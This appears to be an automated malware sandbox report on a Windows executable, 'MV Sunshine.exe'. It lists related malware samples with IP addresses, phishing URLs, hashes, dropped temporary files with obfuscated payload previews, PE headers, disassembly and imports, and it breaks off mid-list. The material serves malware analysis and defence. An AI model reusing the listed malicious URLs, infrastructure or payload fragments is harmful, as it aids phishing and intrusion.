	https://flaviarc.com/vrecord%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/	Get hash	malicious	HTMLPhisher	Browse	50.116.54.61
MICROSOFT-CORP-MSN-AS-BLOCKUS	https://eu-central-1.protection.sophos.com/?d=sharepoint.com&u=aHR0cHM6Ly9uZXRvcmc1NTI5NjcxLW15LnNoYXJlcG9pbnQuY29tLzp1Oi9nL3BlcnNvbmFsL2JrYXR6bWFuX2Jha2Nvbl9jYS9FY05hS3RrLXZuNUxzRUREN3ZGT2tLd0Jyd2lPd2sxRUt2WjFIeEZzY19IbExRP2U9Z3NzdVR1&p=m&i=NWNiN2ZlZTg4MWQzYmMxNDQ2YTllNGIz&t=ZlRrdEtuVnlvSnRrRmpiWkdaa0QzUnJKUkZtT05pdmhFSTRnQi9rMnhuZz0=&h=0dfd0e65e0964d34b38aeba6b2a34689&s=AVNPUEhUT0NFTkNSWVBUSVYygINiVNhfZZgtuoRvmxtnIfDHW8XVBEMJ-Rud22NUlMhqF-vLa95XzSmpA0zQuH8	Get hash	malicious	Unknown	Browse	52.108.8.12
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Stealc, Vidar	Browse	94.245.104.56
	mpsl.elf	Get hash	malicious	Mirai	Browse	20.156.126.250
	arm7.elf	Get hash	malicious	Mirai	Browse	52.179.209.28
	arm5.elf	Get hash	malicious	Mirai	Browse	21.215.245.129
	na.elf	Get hash	malicious	Mirai	Browse	20.237.114.69
	ppc.elf	Get hash	malicious	Mirai	Browse	52.121.72.166
	nuklear.arm.elf	Get hash	malicious	Mirai, Moobot	Browse	13.64.79.70
	sora.arm.elf	Get hash	malicious	Mirai	Browse	40.111.155.147
	sora.mips.elf	Get hash	malicious	Mirai	Browse	20.216.162.3
ADVANTAGECOMUS	SWIFT.exe	Get hash	malicious	FormBook	Browse	66.29.146.14
	#10302024.exe	Get hash	malicious	FormBook	Browse	66.29.146.14
	Remittance Receipt.exe	Get hash	malicious	AgentTesla	Browse	66.29.159.53
	mm.exe	Get hash	malicious	Unknown	Browse	66.29.137.43
	rBALT-10212024.exe	Get hash	malicious	FormBook	Browse	66.29.149.46
	9b7dlGj5Gq.exe	Get hash	malicious	FormBook	Browse	66.29.141.40
	https://vestliaresort-my.sharepoint.com/:o:/g/personal/ziga_vestlia_no/Eky579E0q2lOhPOUshOGsHcBMaZdCfwRcrEzHT2ZmUZxNA?e=ksWeaa	Get hash	malicious	Unknown	Browse	66.29.147.206
	https://new-doctor-booking-php-mysql.filemakrxpert.com/	Get hash	malicious	Unknown	Browse	66.29.148.84
	https://mairenaflores.com/office.html	Get hash	malicious	Unknown	Browse	66.29.141.48
	rAGROTIS10599242024.exe	Get hash	malicious	FormBook	Browse	66.29.149.46

Process:	C:\Windows\SysWOW64\find.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\autC552.tmp

Download File

Process:	C:\Users\user\Desktop\MV Sunshine.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.995242356276726
Encrypted:	true
SSDEEP:	6144:VwgEGdlimXN+hdcoCWFhNQZQ8s1WtkkQR0dpn+pkKHvAHR8CRjw:VwgXmmAhOoCWb1Wtkko0dp+p/PAHR1Fw
MD5:	6FC3EE8DB0B2B7C50424E2133D582FAA
SHA1:	6CE2981CC6A1F75FC2106ADCCA702F0219726308
SHA-256:	CFFF108C9077A9D6BCEE966CAD9C57B748A368CB64E544FFCA7C88E4AD6555F3
SHA-512:	AA404ECA223B24D6B489373B04B9D979086C039C1D36632312FAB2B21C880EDB654EFE249A93F3AD0EACC5FD77C64E1486F3085BD35C100C8E48BE3A0A939883
Malicious:	false
Reputation:	low
Preview:	zo.b.JNTTn..Q..f.WD....4=...JNTT61HXVCMPZCWGRR2875V0GJNTT6.HXVMR.TC.N.s.9{.wd/#=t$D^/*7.m3;-9(&rP].G#^g# t.ybh59'(~WN]cRR2875VIFC.i4Q.u81.p0=.M....XP.L..r43.+...-7..>$:oR_.5V0GJNTTftHX.BLP....RR2875V0.JLU_7:HX.GMPZCWGRR2X#5V0WJNT$21HX.CM@ZCWERR4875V0GJHTT61HXVC=TZCUGRR2877Vp.JNDT6!HXVC]PZSWGRR28'5V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNz SI<XVC..^CWWRR2l35V GJNTT61HXVCMPZcWG2R2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR28

C:\Users\user\AppData\Local\Temp\autC582.tmp

Download File

Process:	C:\Users\user\Desktop\MV Sunshine.exe
File Type:	data
Category:	dropped
Size (bytes):	14614
Entropy (8bit):	7.628350026828942
Encrypted:	false
SSDEEP:	384:FTYznwN1qHnlyyYKnfvWMEL11bBDwUyb3jap3FIOt+uVVJSRgIj:FAwN1kn/PnfvWL1bBDl3eq1Mam
MD5:	B31149EDCEDC50809C81228404C08A94
SHA1:	76E5CE62554A48C156047D3F79A03CA5E24A6BD0
SHA-256:	D6C13337618B534597E9ECF11D777B0C28B31C5DAF526EE29B1EE5C06F04E6D2
SHA-512:	187A4996020789DCFC3FFCCDFFE3577E895EE161E9CFAB2AF01C3CCFA4D67632E6FD944BCE65C02F3C60CB028F893CE21780098CDE0502B7C21347478A8FDC9D
Malicious:	false
Preview:	EA06..0...&.i..+x..f....... .V......71...@.x..L........`......8............`.......Z\|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...\| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<\|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h\|!._....ga._.5.1.....`v/.......NA...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....\|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....\|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

C:\Users\user\AppData\Local\Temp\bohmite

Download File

Process:	C:\Users\user\Desktop\MV Sunshine.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	143378
Entropy (8bit):	2.838882378514597
Encrypted:	false
SSDEEP:	192:en/SvruY9XdqOWTConmo9/W+WW5xoUfoN/WtqWmPzNW/YKM2nRSn1Dq/M1WShL1A:I
MD5:	4964FE25602D9BFF0EC8D0DEBF295351
SHA1:	1982B74B0361F3CD6930E66FEE7BF43ECFAB7318
SHA-256:	A93957B8DBEF6A3D84DF47403EAE1727409539C93F4C4FC78C8F97E2A2BBAE63
SHA-512:	E66E0016B5912EA0F4B9401EB4B512110EE37EF7A21820F00A3D9A2C0FD74E1971E654CAE87F6CD16610D2D5CFB6625F4E5F8F9DF2A7DCA09575DA999E3A1990
Malicious:	false
Preview:	gh5f0gh5fxgh5f5gh5f5gh5f8gh5fbgh5fegh5fcgh5f8gh5f1gh5fegh5fcgh5fcgh5fcgh5f0gh5f2gh5f0gh5f0gh5f0gh5f0gh5f5gh5f6gh5f5gh5f7gh5fbgh5f8gh5f6gh5fbgh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f4gh5f5gh5f8gh5f4gh5fbgh5f9gh5f6gh5f5gh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f4gh5fdgh5f8gh5f6gh5fbgh5fagh5f7gh5f2gh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f5gh5f5gh5f8gh5f8gh5fbgh5f8gh5f6gh5fegh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f4gh5f5gh5f8gh5fagh5fbgh5f9gh5f6gh5f5gh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f4gh5fdgh5f8gh5fcgh5fbgh5fagh5f6gh5fcgh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f5gh5f5gh5f8gh5fegh5fbgh5f8gh5f3gh5f3gh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f4gh5f5gh5f9gh5f0gh5fbgh5f9gh5f3gh5f2gh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f4gh5fdgh5f9gh5f2gh5fbgh5fagh5f2gh5fegh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f5gh5f5gh5f9gh5f4gh5fbgh5f8gh5f6gh5f4gh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9

C:\Users\user\AppData\Local\Temp\croc

Download File

Process:	C:\Users\user\Desktop\MV Sunshine.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.995242356276726
Encrypted:	true
SSDEEP:	6144:VwgEGdlimXN+hdcoCWFhNQZQ8s1WtkkQR0dpn+pkKHvAHR8CRjw:VwgXmmAhOoCWb1Wtkko0dp+p/PAHR1Fw
MD5:	6FC3EE8DB0B2B7C50424E2133D582FAA
SHA1:	6CE2981CC6A1F75FC2106ADCCA702F0219726308
SHA-256:	CFFF108C9077A9D6BCEE966CAD9C57B748A368CB64E544FFCA7C88E4AD6555F3
SHA-512:	AA404ECA223B24D6B489373B04B9D979086C039C1D36632312FAB2B21C880EDB654EFE249A93F3AD0EACC5FD77C64E1486F3085BD35C100C8E48BE3A0A939883
Malicious:	false
Preview:	zo.b.JNTTn..Q..f.WD....4=...JNTT61HXVCMPZCWGRR2875V0GJNTT6.HXVMR.TC.N.s.9{.wd/#=t$D^/*7.m3;-9(&rP].G#^g# t.ybh59'(~WN]cRR2875VIFC.i4Q.u81.p0=.M....XP.L..r43.+...-7..>$:oR_.5V0GJNTTftHX.BLP....RR2875V0.JLU_7:HX.GMPZCWGRR2X#5V0WJNT$21HX.CM@ZCWERR4875V0GJHTT61HXVC=TZCUGRR2877Vp.JNDT6!HXVC]PZSWGRR28'5V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNz SI<XVC..^CWWRR2l35V GJNTT61HXVCMPZcWG2R2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR2875V0GJNTT61HXVCMPZCWGRR28

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.104412836237241
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	MV Sunshine.exe
File size:	1'458'176 bytes
MD5:	475b4ea012d5203638f77e129c548bbb
SHA1:	cef400f9a232fe1554a23477ea5fe8352e33b620
SHA256:	b267f630524c57624e9db7a98ec0b6961d81d1b458a7b48a01802a9172e12a27
SHA512:	73e531edca31d98a91979c215bdd4a82158e83b008785256aba2ead28ca123578e59bd76f30455d651c8b4eaa6938b8abb66f41892afee14534b88aa31b42b25
SSDEEP:	24576:rAHnh+eWsN3skA4RV1Hom2KXFmIar9tlBYemxYVgcRkVd1LS5:Gh+ZkldoPK1Xar/jYemmVIVd18
TLSH:	A565BF026B9C9065FF9AA1339B25E22647787C65527384AF33E81D7B78742F1133E236
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	c58ee08c9594cd55

Static PE Info

General

Entrypoint:	0x42800a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67281C5D [Mon Nov 4 00:59:09 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F235C4FDF8Dh
jmp 00007F235C4F0D44h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F235C4F0ECAh
cmp edi, eax
jc 00007F235C4F122Eh
bt dword ptr [004C41FCh], 01h
jnc 00007F235C4F0EC9h
rep movsb
jmp 00007F235C4F11DCh
cmp ecx, 00000080h
jc 00007F235C4F1094h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F235C4F0ED0h
bt dword ptr [004BF324h], 01h
jc 00007F235C4F13A0h
bt dword ptr [004C41FCh], 00000000h
jnc 00007F235C4F106Dh
test edi, 00000003h
jne 00007F235C4F107Eh
test esi, 00000003h
jne 00007F235C4F105Dh
bt edi, 02h
jnc 00007F235C4F0ECFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F235C4F0ED3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F235C4F0F25h
bt esi, 03h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc0cc	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0x999cc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x162000	0x7134	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4b50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dfdd	0x8e000	310e36668512d53489c005622bb1b4a9	False	0.5735602580325704	data	6.675248351711057	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2fd8e	0x2fe00	f006ab74d3c653b5c5a6cc0c77a171a2	False	0.32829838446475196	data	5.7632462979925245	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbf000	0x8f74	0x5200	aae9601d920f07080bdfadf43dfeff12	False	0.1017530487804878	data	1.1963819235530628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc8000	0x999cc	0x99a00	fbcda77a6455d84ce142406ad77f009b	False	0.7432029978641171	data	7.4459475872857155	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x162000	0x7134	0x7200	f04128ad0f87f42830e4a6cdbc38c719	False	0.7617530153508771	data	6.783955557128661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc8650	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	Great Britain	0.5150709219858156
RT_ICON	0xc8ab8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc8be0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	Great Britain	0.37682926829268293
RT_ICON	0xc9248	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	Great Britain	0.478494623655914
RT_ICON	0xc9530	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	English	Great Britain	0.514344262295082
RT_ICON	0xc9718	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	Great Britain	0.49324324324324326
RT_ICON	0xc9840	0x6ed1	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	Great Britain	0.9985195107335472
RT_ICON	0xd0714	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	Great Britain	0.570362473347548
RT_ICON	0xd15bc	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	Great Britain	0.6430505415162455
RT_ICON	0xd1e64	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	English	Great Britain	0.5616359447004609
RT_ICON	0xd252c	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	Great Britain	0.4125722543352601
RT_ICON	0xd2a94	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	Great Britain	0.13950668401750857
RT_ICON	0xe32bc	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	Great Britain	0.22774332562539415
RT_ICON	0xec764	0x67e8	Device independent bitmap graphic, 80 x 160 x 32, image size 26560	English	Great Britain	0.23240601503759398
RT_ICON	0xf2f4c	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	Great Britain	0.25914972273567466
RT_ICON	0xf83d4	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	Great Britain	0.24728389230042513
RT_ICON	0xfc5fc	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	Great Britain	0.3354771784232365
RT_ICON	0xfeba4	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	Great Britain	0.3778142589118199
RT_STRING	0xffc4c	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0x1001e0	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0x10086c	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0x100cfc	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0x1012f8	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0x101954	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0x101dbc	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0x101f14	0x5f4d2	data			1.0003227839345825
RT_GROUP_ICON	0x1613e8	0x102	data	English	Great Britain	0.6124031007751938
RT_GROUP_ICON	0x1614ec	0x14	data	English	Great Britain	1.15
RT_VERSION	0x161500	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x1615dc	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, 